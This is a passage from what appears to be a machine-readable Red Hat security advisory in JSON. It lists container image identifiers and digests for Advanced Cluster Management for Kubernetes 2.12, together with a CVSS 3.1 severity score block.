"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
